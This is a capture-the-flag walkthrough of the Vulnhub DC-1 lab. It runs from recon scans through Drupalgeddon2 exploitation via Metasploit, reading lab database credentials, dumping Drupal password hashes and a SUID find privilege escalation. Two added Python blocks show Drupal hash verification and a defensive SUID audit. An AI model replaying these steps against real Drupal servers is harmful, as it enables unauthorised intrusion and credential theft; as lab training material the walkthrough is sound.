Today we will look at the DC series from Vulnhub, a great series for getting started with pentesting and for keeping your practice fresh. Let's begin.
Started with an arp-scan to find the target box
dmcxblue@kali:~/Documents/vulnhub/DC1$ sudo arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
10.140.1.1 a4:08:f5:53:18:56 (Unknown)
10.140.1.174 f4:f5:d8:d1:b8:4e Google, Inc.
10.140.1.172 00:c0:ca:96:e7:91 ALFA, INC.
10.140.1.171 30:d9:d9:54:6f:e2 (Unknown)
10.140.0.160 08:00:27:d6:33:69 Cadmus Computer Systems
10.140.1.179 84:4b:f5:63:d7:74 Hon Hai Precision Ind. Co.,Ltd.
10.140.1.176 98:ca:33:9f:5f:a6 (Unknown)
7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.187 seconds (117.06 hosts/sec). 7 responded
Proceeded with a full port scan, followed by a more targeted scan of any open ports found
dmcxblue@kali:~/Documents/vulnhub/DC1$ sudo nmap 10.140.0.160 -p- -sT --min-rate 5000
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-28 02:57 PDT
Nmap scan report for DC-1 (10.140.0.160)
Host is up (0.00016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
44820/tcp open unknown
MAC Address: 08:00:27:D6:33:69 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
The Nikto scan comes back with many false positives, but by visiting port 80 we can filter the results down to the CMS we identified there (Drupal 7)
dmcxblue@kali:~/Documents/vulnhub/DC1$ nikto -h http://10.140.0.160/ -o nikto-DC1.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.140.0.160
+ Target Hostname: 10.140.0.160
+ Target Port: 80
+ Start Time: 2019-08-28 11:57:33 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Wed Nov 20 12:45:59 2013
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ OSVDB-39272: /misc/favicon.ico file identifies this app/server as: Drupal 7.x
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ /nsn/fdir.bas:ShowVolume: A database error may reveal internal details about the running database.
+ /nsn/fdir.bas: A database error may reveal internal details about the running database.
+ /servlet/webacc: A database error may reveal internal details about the running database.
+ /forum/admin/database/wwForum.mdb: A database error may reveal internal details about the running database.
--Snip--

After a few days [JK] the results are back from our droopescan
dmcxblue@kali:~/Documents/vulnhub/DC1$ droopescan scan drupal -u http://10.140.0.160/
[+] Plugins found:
ctools http://10.140.0.160/sites/all/modules/ctools/
http://10.140.0.160/sites/all/modules/ctools/LICENSE.txt
http://10.140.0.160/sites/all/modules/ctools/API.txt
views http://10.140.0.160/sites/all/modules/views/
http://10.140.0.160/sites/all/modules/views/README.txt
http://10.140.0.160/sites/all/modules/views/LICENSE.txt
image http://10.140.0.160/modules/image/
profile http://10.140.0.160/modules/profile/
php http://10.140.0.160/modules/php/
[+] Themes found:
seven http://10.140.0.160/themes/seven/
garland http://10.140.0.160/themes/garland/
[+] Possible version(s):
7.22
7.23
7.24
7.25
7.26
[+] Possible interesting urls found:
Default admin - http://10.140.0.160/user/login
[+] Scan finished (0:12:01.481775 elapsed)

Enumerating with searchsploit using the following command:
searchsploit Drupal 7
We get a handful of results, but we filter them down to the ones that give code execution. We can skip the entries whose attack vectors we do not have, such as [Authenticated] or [SQL],
and go for Drupalgeddon2
dmcxblue@kali:~/Documents/vulnhub/DC1$ searchsploit Drupal 7
---------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
---------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
I initiated msfconsole and searched for Drupal exploits, which came back with the same results as searchsploit
dmcxblue@kali:~/Documents/vulnhub/DC1$ sudo msfconsole
=[ metasploit v5.0.42-dev ]
+ -- --=[ 1915 exploits - 1074 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 >
Chose the Drupalgeddon2 exploit module and set the parameters needed to attack the box

Executed the exploit and received a meterpreter shell

A simple ls for listing directories shows me that there is a flag1.txt file; I will proceed to cat the file and view its contents
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
After researching Drupal's directory layout and config file paths I found the second flag
www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
/**
* Access control for update.php script.
These credentials are for a database; the driver tells us it is MySQL, yet nmap did not find a MySQL port open. That is because the service is listening locally
and is not exposed to the network. We can verify that with netstat
www-data@DC-1:/var/www$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40067 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 10.140.0.160:33825 10.140.0.161:4444 ESTABLISHED 3456/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::58006 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 1 0 10.1

We notice that when we run the mysql command with everything entered correctly we get no output. The fix is to upgrade the shell with python or any other tool that gives you a proper TTY; I used python here as it was available
python -c 'import pty;pty.spawn("/bin/bash")'

Moving around the DB we find a users table, so I will dump everything from there and view its contents
mysql> SELECT * FROM users;
SELECT * FROM users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
mysql>
These are Drupal 7 password hashes ($S$ prefix); we will continue by cracking them.
We utilized hashcat on a Windows box to crack the hashes found in the SQL database
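To understand what those $S$ values are before throwing a cracker at them, here is an added example (not from the original post or from Drupal's code base) that re-implements Drupal 7's password scheme in Python: it parses the setting prefix to report the cost factor and salt, and verifies a candidate password the way Drupal's own login check does. The constants are Drupal 7's real values; the alphabet and encoding are Drupal's phpass-style variant. Useful for a defender auditing a dump: hashes with a cost below the default 'D' (2^15 rounds) or with legacy prefixes deserve a forced reset.

```python
import hashlib
import hmac
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55                              # stored $S$ hashes are cut to 55 chars
MIN_LOG2, MAX_LOG2, DEFAULT_LOG2 = 7, 30, 15  # cost = log2(iteration count); 'D' == 15

def _b64(data):
    """Drupal's phpass-style base64 (little-endian, custom alphabet), not RFC 4648."""
    out, i, n = [], 0, len(data)
    while i < n:
        value, i = data[i], i + 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(stored):
    """(count_log2, salt) from the 12-char '$S$<cost><salt>' prefix, or None if malformed."""
    count_log2 = ITOA64.find(stored[3]) if len(stored) >= 12 else -1
    if stored[:1] != "$" or stored[2:3] != "$" or not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    return count_log2, stored[4:12]

def drupal7_hash(password, setting):
    """sha512(salt + pw), then 2**count_log2 rounds of sha512(h + pw), encoded, truncated."""
    parsed = parse_setting(setting)
    if parsed is None or len(password) > 512:      # Drupal refuses >512-char passwords
        return None
    count_log2, salt = parsed
    pw = password.encode()
    h = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.sha512(h + pw).digest()
    return (setting[:12] + _b64(h))[:HASH_LENGTH]

def check_password(password, stored):
    """Verify a candidate the way user_check_password() does for $S$ (sha512) hashes."""
    computed = drupal7_hash(password, stored) if stored.startswith("$S$") else None
    return computed is not None and hmac.compare_digest(computed, stored)
```

Legacy `U$`-prefixed hashes (an extra md5 of the password) and the `$P$`/`$H$` md5 schemes are deliberately not handled here.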


Logged in as admin

Found the Flag 3 post


We will go back to our shell and look for any permissions that will help us escalate privileges or get the passwd file
The find binary has root privileges (the SUID bit), so this is likely our route to root

I used GTFOBins to find privilege escalation options for that specific binary
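From the defender's side, the fix for this box is to find SUID files that have no business being there and strip the bit. Below is an added example (not part of the original post) of a small SUID audit: it walks a filesystem, lists setuid regular files, and reports those not on an assumed baseline allowlist. The baseline is a starting point of common Debian SUID binaries, not an authoritative list, and the demo builds a constructed temp tree instead of scanning the real host.

```python
import os
import stat
import tempfile

# Assumed baseline of SUID binaries expected on a Debian web host; tune per image.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/lib/openssh/ssh-keysign",
}

def find_suid(root="/"):
    """Walk root and return sorted paths of regular files with the setuid bit set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Pseudo-filesystems hold no real binaries; skip them when scanning "/".
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue   # unreadable, or vanished between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """SUID files not in the baseline: review each, then 'chmod u-s' if not needed."""
    return [p for p in paths if p not in baseline]

def demo():
    """Constructed sample tree: one SUID 'find' (as on the box above) and a normal 'ls'."""
    root = tempfile.mkdtemp()
    suid_find = os.path.join(root, "usr", "bin", "find")
    plain_ls = os.path.join(root, "usr", "bin", "ls")
    os.makedirs(os.path.dirname(suid_find))
    for p in (suid_find, plain_ls):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid_find, 0o4755)   # the setuid bit that hands root to whoever runs it
    os.chmod(plain_ls, 0o755)
    return suid_find, find_suid(root)

if __name__ == "__main__":
    expected_hit, found = demo()
    for p in unexpected_suid(found):
        print("unexpected SUID file:", p)
```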

With this we finally receive the final flag
